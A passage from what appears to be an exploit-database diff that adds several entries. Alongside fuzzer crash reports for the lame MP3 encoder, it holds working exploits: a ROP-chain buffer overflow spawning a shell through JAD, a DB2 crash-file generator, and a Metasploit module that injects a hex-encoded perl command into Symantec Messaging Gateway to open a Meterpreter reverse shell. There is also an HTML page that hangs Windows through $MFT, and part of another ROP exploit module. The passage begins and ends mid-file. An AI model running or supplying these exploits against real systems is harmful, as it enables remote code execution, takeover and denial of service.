    #10 0x51e4fa in get_audio /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:688:16
    #11 0x50f776 in lame_encoder_loop /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:456:17
    #12 0x50f776 in lame_encoder /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:531
    #13 0x50c43f in lame_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:707:15
    #14 0x510793 in c_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:470:15
    #15 0x510793 in main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:438
    #16 0x7f598be51680 in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #17 0x41c998 in _init (/usr/bin/lame+0x41c998)
 0x7f598d317f20 is located 0 bytes to the right of global variable 'alloc_2' defined in '/var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/l2tables.h:118:24' (0x7f598d317de0) of size 320
 SUMMARY: AddressSanitizer: global-buffer-overflow /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:144:36 in II_step_one
 Shadow bytes around the buggy address:
  0x0febb1a5af90: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0febb1a5afa0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0febb1a5afb0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0febb1a5afc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0febb1a5afd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0febb1a5afe0: 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0febb1a5aff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0febb1a5b000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0febb1a5b010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0febb1a5b020: 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0febb1a5b030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==27479==ABORTING
 Affected version:
 3.99.5
 Fixed version:
 N/A
 Commit fix:
 N/A
 Credit:
 This bug was discovered by Agostino Sarubbo of Gentoo.
 CVE:
 N/A
 Reproducer:
 https://github.com/asarubbo/poc/blob/master/00290-lame-globaloverflow-II_step_one
 Timeline:
 2017-06-01: bug discovered
 2017-06-17: blog post about the issue
 Note:
 This bug was found with American Fuzzy Lop.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42258.zip
--- a/platforms/linux/dos/42259.txt
+++ b/platforms/linux/dos/42259.txt
@ -0,0 +1,91 @@
 Description:
 lame is a high quality MPEG Audio Layer III (MP3) encoder licensed under the LGPL.
 Few notes before the details of this bug. Time ago a fuzz was done by Brian Carpenter and Jakub Wilk which posted the results on the debian bugtracker. In cases like this, when upstream is not active and people do not post on the upstream bugzilla is easy discover duplicates, so I downloaded all available testcases, and noone of the bug you will see on my blog is a duplicate of an existing issue. Upstream seems a bit dead, latest release was into 2011, so this blog post will probably forwarded on the upstream bugtracker just for the record.
 The complete ASan output of the issue:
 # lame -f -V 9 $FILE out.wav
 ==30801==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe82a515a0 at pc 0x7f56d24c9df7 bp 0x7ffe82a4ffb0 sp 0x7ffe82a4ffa8
 WRITE of size 4 at 0x7ffe82a515a0 thread T0
    #0 0x7f56d24c9df6 in III_dequantize_sample /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c
    #1 0x7f56d24a664f in decode_layer3_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c:1738:17
    #2 0x7f56d24733ca in decodeMP3_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:615:13
    #3 0x7f56d2470c13 in decodeMP3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:696:12
    #4 0x7f56d2431092 in decode1_headersB_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:149:11
    #5 0x7f56d243694a in hip_decode1_headersB /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:436:16
    #6 0x7f56d243694a in hip_decode1_headers /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:379
    #7 0x51e984 in lame_decode_fromfile /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:2089:11
    #8 0x51e984 in read_samples_mp3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:877
    #9 0x51e984 in get_audio_common /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:785
    #10 0x51e4fa in get_audio /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:688:16
    #11 0x50f776 in lame_encoder_loop /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:456:17
    #12 0x50f776 in lame_encoder /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:531
    #13 0x50c43f in lame_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:707:15
    #14 0x510793 in c_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:470:15
    #15 0x510793 in main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:438
    #16 0x7f56d1029680 in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #17 0x41c998 in _init (/usr/bin/lame+0x41c998)
 Address 0x7ffe82a515a0 is located in stack of thread T0 at offset 5024 in frame
    #0 0x7f56d24a548f in decode_layer3_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c:1659
  This frame has 4 object(s):
    [32, 344) 'scalefacs'
    [416, 5024) 'hybridIn' 0x1000505422b0: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
  0x1000505422c0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
  0x1000505422d0: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000505422e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000505422f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100050542300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==30801==ABORTING
 Affected version:
 3.99.5
 Fixed version:
 N/A
 Commit fix:
 N/A
 Credit:
 This bug was discovered by Agostino Sarubbo of Gentoo.
 CVE:
 N/A
 Reproducer:
 https://github.com/asarubbo/poc/blob/master/00294-lame-stackoverflow-III_dequantize_sample
 Timeline:
 2017-06-01: bug discovered
 2017-06-17: blog post about the issue
 Note:
 This bug was found with American Fuzzy Lop.
 Permalink:
 https://blogs.gentoo.org/ago/2017/06/17/lame-stack-based-buffer-overflow-in-iii_dequantize_sample-layer3-c
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42259.zip
--- a/platforms/linux/local/42255.py
+++ b/platforms/linux/local/42255.py
@ -0,0 +1,103 @@
 #!/usr/bin/python
 # Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
 # Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
 # Tested on: GNU/Linux - Kali 2017.1 Release
 #
 # Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is prone to a stack-based buffer overflow
 # vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
 #
 # An attacker could exploit this vulnerability to execute arbitrary code in the
 # context of the application. Failed exploit attempts will result in a
 # denial-of-service condition.
 #
 # Vendor homepage: http://www.varaneckas.com/jad/
 #
 # CANARY    : disabled
 # FORTIFY   : disabled
 # NX        : ENABLED
 # PIE       : disabled
 # RELRO     : disabled
 #
 import os, subprocess
 from struct import pack
 ropchain = "A"*8150 # junk
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe0) # @ .data
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0807b744) # pop eax ; ret
 ropchain += '/bin'
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe4) # @ .data + 4
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0807b744) # pop eax ; ret
 ropchain += '//sh'
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
 ropchain += pack('<I', 0x0811abe0) # @ .data
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x08067b43) # pop ecx ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080c861f) # int 0x80
 try:
   print("[*] JAD 1.5.8 Stack-Based Buffer Overflow by Juan Sacco")
   print("[*] Please wait.. running")
   subprocess.call(["jad", ropchain])
 except OSError as e:
   if e.errno == os.errno.ENOENT:
       print "JAD  not found!"
   else:
    print "Error executing exploit"
   raise
--- a/platforms/multiple/dos/42260.py
+++ b/platforms/multiple/dos/42260.py
@ -0,0 +1,95 @@
 '''
           DefenseCode Security Advisory
    IBM DB2 Command Line Processor Buffer Overflow
 Advisory ID: DC-2017-04-002
 Advisory Title: IBM DB2 Command Line Processor Buffer Overflow
 Advisory URL:
 http://www.defensecode.com/advisories/IBM_DB2_Command_Line_Processor_Buffer_Overflow.pdf
 Software: IBM DB2
 Version: V9.7, V10.1, V10.5 and V11.1 on all platforms
 Vendor Status: Vendor Contacted / Fixed (CVE-2017-1297)
 Release Date: 26.06.2017
 Risk: High
 1. General Overview
 ===================
 IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) Command
 Line Process (CLP) is vulnerable to a stack based buffer overflow, caused
 by improper bounds checking which could allow an attacker to execute
 arbitrary code. The vulnerability is triggered by providing an overly
 long procedure name inside a CALL statement.
 2. Software Overview
 ===================
 DB2 is a database product from IBM. It is a Relational Database Management
 System. DB2 is designed to store, analyze and retrieve the data efficiently.
 DB2 currently supports Linux, UNIX and Windows platforms.
 db2bp is a persistent background process for the DB2 Command Line
 Processor,
 and it is the process which actually connects to the database.
 3. Brief Vulnerability Description
 ==================================
 By providing a specially crafted command file to the db2 CLP utility, it is
 possible to cause a buffer overflow and possibly hijack the execution flow
 of the program. Crafted file contains a CALL statement with an overly long
 procedure parameter.
 3.1 Proof of Concept
 The following python script will generate a proof of concept .sql crash
 test
 file that can be used to verify the vulnerability:
 -------
 '''
 #!/usr/bin/python
 load_overflow = 'A' * 1000
 statement = "CALL " + load_overflow + ";"
 crash_file = open("crash.sql", "w")
 crash_file.write(statement)
 crash_file.close()
 '''
 -------
 PoC usage: db2 -f crash.sql
 4. Credits
 ==========
 Vulnerability discovered by Leon Juranic, further analysis by Bosko
 Stankovic.
 5. About DefenseCode
 ================================
 DefenseCode L.L.C. delivers products and services designed to analyze
 and test
 web, desktop and mobile applications for security vulnerabilities.
 DefenseCode ThunderScan is a SAST (Static Application Security Testing,
 WhiteBox
 Testing) solution for performing extensive security audits of
 application source
 code. ThunderScan performs fast and accurate analyses of large and complex
 source code projects delivering precise results and low false positive rate.
 DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
 BlackBox
 Testing) solution for comprehensive security audits of active web
 applications.
 WebScanner will test a website's security by carrying out a large number of
 attacks using the most advanced techniques, just as a real attacker would.
 Subscribe for free software trial on our website http://www.defensecode.com/
 '''
--- a/platforms/python/remote/42251.rb
+++ b/platforms/python/remote/42251.rb
@ -0,0 +1,202 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Symantec Messaging Gateway Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a
        terminal command under the context of the web server user which is root.
        backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
        operating system command. One of the user input is being passed to the service without proper validation. That cause an command
        injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal
        command. Thus, you need to configure your own SSH service and set the required parameter during module usage.
        This module was tested against Symantec Messaging Gateway 10.6.2-7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/'],
          ['CVE', '2017-6326']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 443,
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => true,
      'DisclosureDate' => "Apr 26 2017",
      'DefaultTarget'  => 0
    ))
    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with']),
        OptString.new('SSH_ADDRESS', [true, 'The ip address of your SSH service']),
        OptInt.new('SSH_PORT', [true, 'The port of your SSH service', 22]),
        OptString.new('SSH_USERNAME', [true, 'The username of your SSH service']),
        OptString.new('SSH_PASSWORD', [true, 'The password of your SSH service']),
        OptString.new('TARGETURI', [true, 'The base path to Symantec Messaging Gateway', '/'])
      ]
    )
  end
  def username
    datastore['USERNAME']
  end
  def password
    datastore['PASSWORD']
  end
  def ssh_address
    datastore['SSH_ADDRESS']
  end
  def ssh_port
    datastore['SSH_PORT']
  end
  def ssh_username
    datastore['SSH_USERNAME']
  end
  def ssh_password
    datastore['SSH_PASSWORD']
  end
  def auth
    print_status("Performing authentication...")
    sid        = ''
    last_login = ''
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'brightmail', 'viewLogin.do')
    })
    if res && !res.get_cookies.empty?
      last_login = res.get_hidden_inputs.first['lastlogin'] || ''
      sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
    else
      fail_with(Failure::Unknown, "Didn't get cookie-set header from response.")
    end
    cookie = ''
    # Performing authentication
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'brightmail', 'login.do'),
      'headers'   => {
        'Referer' => "https://#{peer}/brightmail/viewLogin.do",
        'Connection' => 'keep-alive'
      },
      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
      'vars_post' => {
        'lastlogin'  => last_login,
        'userLocale' => '',
        'lang'       => 'en_US',
        'username'   => username,
        'password'   => password,
        'loginBtn'   => 'Login'
      }
    })
    if res &&res.body =~ /Logged in/
      cookie = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0]
      print_good("Awesome..! Authenticated with #{username}:#{password}")
    else
      fail_with(Failure::Unknown, 'Credentials are not valid.')
    end
    cookie
  end
  def get_csrf_token(cookie)
    print_status('Capturing CSRF token')
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path, 'brightmail', 'admin', 'backup', 'backupNow.do'),
      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{cookie}",
    })
    csrf_token = nil
    if res && res.code == 200
      match = res.body.match(/type="hidden" name="symantec.brightmail.key.TOKEN" value="(\w+)"\/>/)
      if match
        csrf_token = match[1]
        print_good("CSRF token is : #{csrf_token}")
      else
        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
      end
    else
      fail_with(Failure::Unknown, 'Something went wrong.')
    end
    csrf_token
  end
  def exploit
    cookie = auth
    csrf_token = get_csrf_token(cookie)
    # I want to get meterpreter instead of cmd shell but SPACE and some other characters are blacklisted.
    # Note that, we always have one SPACE at the beginning of python payload. e.g: import base64,sys;
    # Here is the thing, use perl payload with ${IFS} technique and deliver the real payload inside of it :)
    # So we gonna execute a perl payload on server side which will execute our meterpreter python payload.
    cmd = "python -c \"#{payload.encoded}\""
    final_payload = cmd.to_s.unpack("H*").first
    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
    # Ok. We are ready to go
    send_request_cgi({
    'method'    => 'POST',
    'uri'       => normalize_uri(target_uri.path, 'brightmail', 'admin', 'backup', 'performBackupNow.do'),
    'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{cookie}",
    'vars_post' => {
      'pageReuseFor'                        => 'backup_now',
      'id'                                  => '',
      'symantec.brightmail.key.TOKEN'       => csrf_token,
      'backupData'                          => 'full',
      'customType'                          => 'configuration',
      'includeIncidentMessages'             => 'true',
      'includeLogData'                      => 'true',
      'backupTo'                            => '2',
      'remoteBackupProtocol'                => 'SCP',
      'remoteBackupAddress'                 => ssh_address,
      'remoteBackupPort'                    => ssh_port,
      'remoteBackupPath'                    => "tmp$(#{p})",
      'requiresRemoteAuthentication'        => 'true',
      'remoteBackupUsername'                => ssh_username,
      'remoteBackupPassword'                => ssh_password,
      }
    })
  end
 end
--- a/platforms/windows/dos/42253.html
+++ b/platforms/windows/dos/42253.html
@ -0,0 +1,26 @@
 <!--
 # Exploit Title: NTFS 3.1 Master File Table DoS Exploit
 # Date: 6\23\17
 # Exploit Author: EagleWire
 # Version: Windows XP/7/8/8.1
 # Tested on: Windows XP/7/8/8.1
 1. Description:
 This exploits a vulnerability in Windows XP to Windows 8.1. The master file table, or MFT, is a hidden file in the NTFS file system. It maps out all files in the drive. It is supposed to be protected from any user access because all files that use NTFS have a reference to it. If the directory is recreated, the system will lock the file until the next reboot. Therefore, for example, when trying to create a file or read the volume of files, NTFS attempts to seize ERESOURCE $ MFT file and will hang at this stage forever.
 2. Exploit:
 The exploit tries to access a nonexistant file c:/$MFT/pwned. The browser will hang then stop responding, then after the browser exists, the rest of the system becomes unresponsive.
 -->
 <!DOCTYPE html>
 <html lang="en">
  <head>
    <link rel="stylesheet" href="stylesheet.css">
    <meta charset="utf-8" />
    <title>Y0U HAVE BEEN EXPL0ITED!</title>  
 </head>
  <body>
    <script src="c:/$MFT/pwned"></script>
  </body>
 </html>
 <!--
 3: Solution:
 -->
--- a/platforms/windows/remote/42256.rb
+++ b/platforms/windows/remote/42256.rb
@ -0,0 +1,159 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  #include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy File Sharing HTTP Server 7.2 POST Buffer Overflow',
      'Description'    => %q{
        This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
      },
      'Author'         =>
        [
          'bl4ck h4ck3r', #POC
          'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '42186' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002280a } ],
        ],
      'DefaultOptions' => {
          'RPORT' => 80,
          'EXITFUNC' => 'thread',
          'ENCODER' => 'x86/alpha_mixed'
        },
      'DisclosureDate' => 'Jun 12 2017',
      'DefaultTarget'  => 0))
  end
  def create_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        # 0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0xFFFFFDFE,  # -202
        0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
        0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]|   {PAGE_EXECUTE_READ}
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x1004de84,  # &Writable location [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
        0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
        0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
        0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
        0x100218f9,  # POP EBP # RETN [ImageLoad.dll]
        0x61c24169,  # & push esp # ret  [sqlite3.dll]
        0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
